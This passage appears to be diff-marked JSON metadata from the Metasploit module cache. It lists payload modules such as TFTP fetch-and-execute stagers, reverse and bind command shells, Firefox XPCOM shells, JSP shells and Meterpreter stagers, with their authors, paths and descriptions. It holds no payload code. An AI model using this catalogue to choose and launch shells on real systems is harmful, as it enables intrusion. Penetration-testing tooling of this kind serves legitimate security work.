"URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/tftp/x64/vncinject/bind_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/tftp/x64", - "adapted_refname": "windows/x64/vncinject/bind_tcp_uuid", - "staged": true, - "stage_refname": "windows/x64/vncinject", - "stager_refname": "windows/x64/bind_tcp_uuid" - }, - "payload_cmd/windows/tftp/x64/vncinject/reverse_http": { - "name": "TFTP Fetch, Windows x64 Reverse HTTP Stager (wininet)", - "fullname": "payload/cmd/windows/tftp/x64/vncinject/reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nTunnel communication over HTTP (Windows x64 wininet)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/tftp/x64/vncinject/reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/tftp/x64", - "adapted_refname": "windows/x64/vncinject/reverse_http", - "staged": true, - "stage_refname": "windows/x64/vncinject", - "stager_refname": "windows/x64/reverse_http" - }, - "payload_cmd/windows/tftp/x64/vncinject/reverse_https": { - "name": "TFTP Fetch, Windows x64 Reverse HTTP Stager (wininet)", - "fullname": "payload/cmd/windows/tftp/x64/vncinject/reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "sf ", - "hdm ", - "agix", - "rwincey" - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nTunnel communication over HTTP (Windows x64 wininet)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/tftp/x64/vncinject/reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/tftp/x64", - "adapted_refname": "windows/x64/vncinject/reverse_https", - "staged": true, - "stage_refname": "windows/x64/vncinject", - "stager_refname": "windows/x64/reverse_https" - }, - "payload_cmd/windows/tftp/x64/vncinject/reverse_tcp": { - "name": "TFTP Fetch, Windows x64 Reverse TCP Stager", - "fullname": "payload/cmd/windows/tftp/x64/vncinject/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "sf " - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nConnect back to the attacker (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/tftp/x64/vncinject/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/tftp/x64", - "adapted_refname": "windows/x64/vncinject/reverse_tcp", - "staged": true, - "stage_refname": "windows/x64/vncinject", - "stager_refname": "windows/x64/reverse_tcp" - }, - "payload_cmd/windows/tftp/x64/vncinject/reverse_tcp_rc4": { - "name": "TFTP Fetch, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/cmd/windows/tftp/x64/vncinject/reverse_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "sf ", - "hdm ", - "skape ", - "mihi", - "max3raza", - "RageLtMan" - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nConnect back to the attacker", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/tftp/x64/vncinject/reverse_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/tftp/x64", - "adapted_refname": "windows/x64/vncinject/reverse_tcp_rc4", - "staged": true, - "stage_refname": "windows/x64/vncinject", - "stager_refname": "windows/x64/reverse_tcp_rc4" - }, - "payload_cmd/windows/tftp/x64/vncinject/reverse_tcp_uuid": { - "name": "TFTP Fetch, Reverse TCP Stager with UUID Support (Windows x64)", - "fullname": "payload/cmd/windows/tftp/x64/vncinject/reverse_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nConnect back to the attacker with UUID Support (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/tftp/x64/vncinject/reverse_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/tftp/x64", - "adapted_refname": "windows/x64/vncinject/reverse_tcp_uuid", - "staged": true, - "stage_refname": "windows/x64/vncinject", - "stager_refname": "windows/x64/reverse_tcp_uuid" - }, - "payload_cmd/windows/tftp/x64/vncinject/reverse_winhttp": { - "name": "TFTP Fetch, Windows x64 Reverse HTTP Stager (winhttp)", - "fullname": "payload/cmd/windows/tftp/x64/vncinject/reverse_winhttp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nTunnel communication over HTTP (Windows x64 winhttp)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/tftp/x64/vncinject/reverse_winhttp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/tftp/x64", - "adapted_refname": "windows/x64/vncinject/reverse_winhttp", - "staged": true, - "stage_refname": "windows/x64/vncinject", - "stager_refname": "windows/x64/reverse_winhttp" - }, - "payload_cmd/windows/tftp/x64/vncinject/reverse_winhttps": { - "name": "TFTP Fetch, Windows x64 Reverse HTTPS Stager (winhttp)", - "fullname": "payload/cmd/windows/tftp/x64/vncinject/reverse_winhttps", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nTunnel communication over HTTPS (Windows x64 winhttp)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/tftp/x64/vncinject/reverse_winhttps", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/tftp/x64", - "adapted_refname": "windows/x64/vncinject/reverse_winhttps", - "staged": true, - "stage_refname": "windows/x64/vncinject", - "stager_refname": "windows/x64/reverse_winhttps" - }, - "payload_firefox/exec": { - "name": "Firefox XPCOM Execute Command", - "fullname": "payload/firefox/exec", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "joev " - ], - "description": "This module runs a shell command on the target OS without touching the disk.\n On Windows, this command will flash the command prompt momentarily.\n This can be avoided by setting WSCRIPT to true, which drops a jscript\n \"launcher\" to disk that hides the prompt.", - "references": [], - "platform": "Firefox", - "arch": "firefox", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/firefox/exec.rb", - "is_install_path": true, - "ref_name": "firefox/exec", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_firefox/shell_bind_tcp": { - "name": "Command Shell, Bind TCP (via Firefox XPCOM script)", - "fullname": "payload/firefox/shell_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "joev " - ], - "description": "Creates an interactive shell via Javascript with access to Firefox's XPCOM API", - "references": [], - "platform": "Firefox", - "arch": "firefox", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/firefox/shell_bind_tcp.rb", - "is_install_path": true, - "ref_name": "firefox/shell_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_firefox/shell_reverse_tcp": { - "name": "Command Shell, Reverse TCP (via Firefox XPCOM script)", - "fullname": "payload/firefox/shell_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "joev " - ], - "description": "Creates an interactive shell via Javascript with access to Firefox's XPCOM API", - "references": [], - "platform": "Firefox", - "arch": "firefox", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/firefox/shell_reverse_tcp.rb", - "is_install_path": true, - "ref_name": "firefox/shell_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_generic/custom": { - "name": "Custom Payload", - "fullname": "payload/generic/custom", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "scriptjunkie " - ], - "description": "Use custom string or file as payload. Set either PAYLOADFILE or\n PAYLOADSTR.", - "references": [], - "platform": "All", - "arch": "x86, x86_64, x64, mips, mipsle, mipsbe, mips64, mips64le, ppc, ppce500v2, ppc64, ppc64le, cbea, cbea64, sparc, sparc64, armle, armbe, aarch64, cmd, php, java, ruby, dalvik, python, nodejs, firefox, zarch, r, riscv32be, riscv32le, riscv64be, riscv64le, loongarch64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/generic/custom.rb", - "is_install_path": true, - "ref_name": "generic/custom", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_generic/debug_trap": { - "name": "Generic x86 Debug Trap", - "fullname": "payload/generic/debug_trap", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "robert " - ], - "description": "Generate a debug trap in the target process", - "references": [], - "platform": "BSD,BSDi,Linux,OSX,Solaris,Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/generic/debug_trap.rb", - "is_install_path": true, - "ref_name": "generic/debug_trap", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_generic/shell_bind_aws_ssm": { - "name": "Command Shell, Bind SSM (via AWS API)", - "fullname": "payload/generic/shell_bind_aws_ssm", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "RageLtMan " - ], - "description": "Creates an interactive shell using AWS SSM", - "references": [ - "URL-https://www.sempervictus.com/single-post/once-upon-a-cloudy-air-i-crossed-a-gap-which-wasn-t-there" - ], - "platform": "All", - "arch": "x86, x86_64, x64, mips, mipsle, mipsbe, mips64, mips64le, ppc, ppce500v2, ppc64, ppc64le, cbea, cbea64, sparc, sparc64, armle, armbe, aarch64, cmd, php, tty, java, ruby, dalvik, python, nodejs, firefox, zarch, r, riscv32be, riscv32le, riscv64be, riscv64le, loongarch64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-07-24 16:42:43 +0000", - "path": "/modules/payloads/singles/generic/shell_bind_aws_ssm.rb", - "is_install_path": true, - "ref_name": "generic/shell_bind_aws_ssm", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_generic/shell_bind_tcp": { - "name": "Generic Command Shell, Bind TCP Inline", - "fullname": "payload/generic/shell_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape " - ], - "description": "Listen for a connection and spawn a command shell", - "references": [], - "platform": "All", - "arch": "x86, x86_64, x64, mips, mipsle, mipsbe, mips64, mips64le, ppc, ppce500v2, ppc64, ppc64le, cbea, cbea64, sparc, sparc64, armle, armbe, aarch64, cmd, php, java, ruby, dalvik, python, nodejs, firefox, zarch, r, riscv32be, riscv32le, riscv64be, riscv64le, loongarch64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/generic/shell_bind_tcp.rb", - "is_install_path": true, - "ref_name": "generic/shell_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_generic/shell_reverse_tcp": { - "name": "Generic Command Shell, Reverse TCP Inline", - "fullname": "payload/generic/shell_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape " - ], - "description": "Connect back to attacker and spawn a command shell", - "references": [], - "platform": "All", - "arch": "x86, x86_64, x64, mips, mipsle, mipsbe, mips64, mips64le, ppc, ppce500v2, ppc64, ppc64le, cbea, cbea64, sparc, sparc64, armle, armbe, aarch64, cmd, php, java, ruby, dalvik, python, nodejs, firefox, zarch, r, riscv32be, riscv32le, riscv64be, riscv64le, loongarch64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/generic/shell_reverse_tcp.rb", - "is_install_path": true, - "ref_name": "generic/shell_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_generic/ssh/interact": { - "name": "Interact with Established SSH Connection", - "fullname": "payload/generic/ssh/interact", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre" - ], - "description": "Interacts with a shell on an established SSH connection", - "references": [], - "platform": "All", - "arch": "x86, x86_64, x64, mips, mipsle, mipsbe, mips64, mips64le, ppc, ppce500v2, ppc64, ppc64le, cbea, cbea64, sparc, sparc64, armle, armbe, aarch64, cmd, php, tty, java, ruby, dalvik, python, nodejs, firefox, zarch, r, riscv32be, riscv32le, riscv64be, riscv64le, loongarch64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-07-24 16:42:43 +0000", - "path": "/modules/payloads/singles/generic/ssh/interact.rb", - "is_install_path": true, - "ref_name": "generic/ssh/interact", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_generic/tight_loop": { - "name": "Generic x86 Tight Loop", - "fullname": "payload/generic/tight_loop", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "jduck " - ], - "description": "Generate a tight loop in the target process", - "references": [], - "platform": "BSD,BSDi,Linux,OSX,Solaris,Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/generic/tight_loop.rb", - "is_install_path": true, - "ref_name": "generic/tight_loop", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_java/jsp_shell_bind_tcp": { - "name": "Java JSP Command Shell, Bind TCP Inline", - "fullname": "payload/java/jsp_shell_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "sf " - ], - "description": "Listen for a connection and spawn a command shell", - "references": [], - "platform": "Linux,OSX,Solaris,Unix,Windows", - "arch": "java", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/java/jsp_shell_bind_tcp.rb", - "is_install_path": true, - "ref_name": "java/jsp_shell_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_java/jsp_shell_reverse_tcp": { - "name": "Java JSP Command Shell, Reverse TCP Inline", - "fullname": "payload/java/jsp_shell_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "sf " - ], - "description": "Connect back to attacker and spawn a command shell", - "references": [], - "platform": "Linux,OSX,Solaris,Unix,Windows", - "arch": "java", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/java/jsp_shell_reverse_tcp.rb", - "is_install_path": true, - "ref_name": "java/jsp_shell_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_java/meterpreter/bind_tcp": { - "name": "Java Meterpreter, Java Bind TCP Stager", - "fullname": "payload/java/meterpreter/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "mihi", - "egypt ", - "OJ Reeves" - ], - "description": "Run a meterpreter server in Java.\n\nListen for a connection", - "references": [], - "platform": "Java", - "arch": "java", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/java/bind_tcp.rb", - "is_install_path": true, - "ref_name": "java/meterpreter/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "java/meterpreter", - "stager_refname": "java/bind_tcp" - }, - "payload_java/meterpreter/reverse_http": { - "name": "Java Meterpreter, Java Reverse HTTP Stager", - "fullname": "payload/java/meterpreter/reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "mihi", - "egypt ", - "OJ Reeves", - "hdm " - ], - "description": "Run a meterpreter server in Java.\n\nTunnel communication over HTTP", - "references": [], - "platform": "Java", - "arch": "java", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/java/reverse_http.rb", - "is_install_path": true, - "ref_name": "java/meterpreter/reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "java/meterpreter", - "stager_refname": "java/reverse_http" - }, - "payload_java/meterpreter/reverse_https": { - "name": "Java Meterpreter, Java Reverse HTTPS Stager", - "fullname": "payload/java/meterpreter/reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "mihi", - "egypt ", - "OJ Reeves", - "hdm " - ], - "description": "Run a meterpreter server in Java.\n\nTunnel communication over HTTPS", - "references": [], - "platform": "Java", - "arch": "java", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/java/reverse_https.rb", - "is_install_path": true, - "ref_name": "java/meterpreter/reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "java/meterpreter", - "stager_refname": "java/reverse_https" - }, - "payload_java/meterpreter/reverse_tcp": { - "name": "Java Meterpreter, Java Reverse TCP Stager", - "fullname": "payload/java/meterpreter/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "mihi", - "egypt ", - "OJ Reeves" - ], - "description": "Run a meterpreter server in Java.\n\nConnect back stager", - "references": [], - "platform": "Java", - "arch": "java", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/java/reverse_tcp.rb", - "is_install_path": true, - "ref_name": "java/meterpreter/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "java/meterpreter", - "stager_refname": "java/reverse_tcp" - }, - "payload_java/shell/bind_tcp": { - "name": "Command Shell, Java Bind TCP Stager", - "fullname": "payload/java/shell/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "mihi", - "egypt " - ], - "description": "Spawn a piped command shell (cmd.exe on Windows, /bin/sh everywhere else).\n\nListen for a connection", - "references": [], - "platform": "Java", - "arch": "java", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/java/bind_tcp.rb", - "is_install_path": true, - "ref_name": "java/shell/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "java/shell", - "stager_refname": "java/bind_tcp" - }, - "payload_java/shell/reverse_tcp": { - "name": "Command Shell, Java Reverse TCP Stager", - "fullname": "payload/java/shell/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "mihi", - "egypt " - ], - "description": "Spawn a piped command shell (cmd.exe on Windows, /bin/sh everywhere else).\n\nConnect back stager", - "references": [], - "platform": "Java", - "arch": "java", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/java/reverse_tcp.rb", - "is_install_path": true, - "ref_name": "java/shell/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "java/shell", - "stager_refname": "java/reverse_tcp" - }, - "payload_java/shell_reverse_tcp": { - "name": "Java Command Shell, Reverse TCP Inline", - "fullname": "payload/java/shell_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "mihi", - "egypt " - ], - "description": "Connect back to attacker and spawn a command shell", - "references": [], - "platform": "Java", - "arch": "java", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/java/shell_reverse_tcp.rb", - "is_install_path": true, - "ref_name": "java/shell_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/aarch64/meterpreter/reverse_tcp": { - "name": "Linux Meterpreter, Reverse TCP Stager", - "fullname": "payload/linux/aarch64/meterpreter/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Adam Cammack " - ], - "description": "Inject the mettle server payload (staged).\n\nConnect back to the attacker", - "references": [], - "platform": "Linux", - "arch": "aarch64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/linux/aarch64/reverse_tcp.rb", - "is_install_path": true, - "ref_name": "linux/aarch64/meterpreter/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "linux/aarch64/meterpreter", - "stager_refname": "linux/aarch64/reverse_tcp" - }, - "payload_linux/aarch64/meterpreter_reverse_http": { - "name": "Linux Meterpreter, Reverse HTTP Inline", - "fullname": "payload/linux/aarch64/meterpreter_reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Run the Meterpreter / Mettle server payload (stageless)", - "references": [], - "platform": "Linux", - "arch": "aarch64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/linux/aarch64/meterpreter_reverse_http.rb", - "is_install_path": true, - "ref_name": "linux/aarch64/meterpreter_reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/aarch64/meterpreter_reverse_https": { - "name": "Linux Meterpreter, Reverse HTTPS Inline", - "fullname": "payload/linux/aarch64/meterpreter_reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Run the Meterpreter / Mettle server payload (stageless)", - "references": [], - "platform": "Linux", - "arch": "aarch64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/linux/aarch64/meterpreter_reverse_https.rb", - "is_install_path": true, - "ref_name": "linux/aarch64/meterpreter_reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/aarch64/meterpreter_reverse_tcp": { - "name": "Linux Meterpreter, Reverse TCP Inline", - "fullname": "payload/linux/aarch64/meterpreter_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Run the Meterpreter / Mettle server payload (stageless)", - "references": [], - "platform": "Linux", - "arch": "aarch64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/linux/aarch64/meterpreter_reverse_tcp.rb", - "is_install_path": true, - "ref_name": "linux/aarch64/meterpreter_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/aarch64/shell/reverse_tcp": { - "name": "Linux dup2 Command Shell, Reverse TCP Stager", - "fullname": "payload/linux/aarch64/shell/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [], - "description": "dup2 socket in x12, then execve.\n\nConnect back to the attacker", - "references": [], - "platform": "Linux", - "arch": "aarch64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": 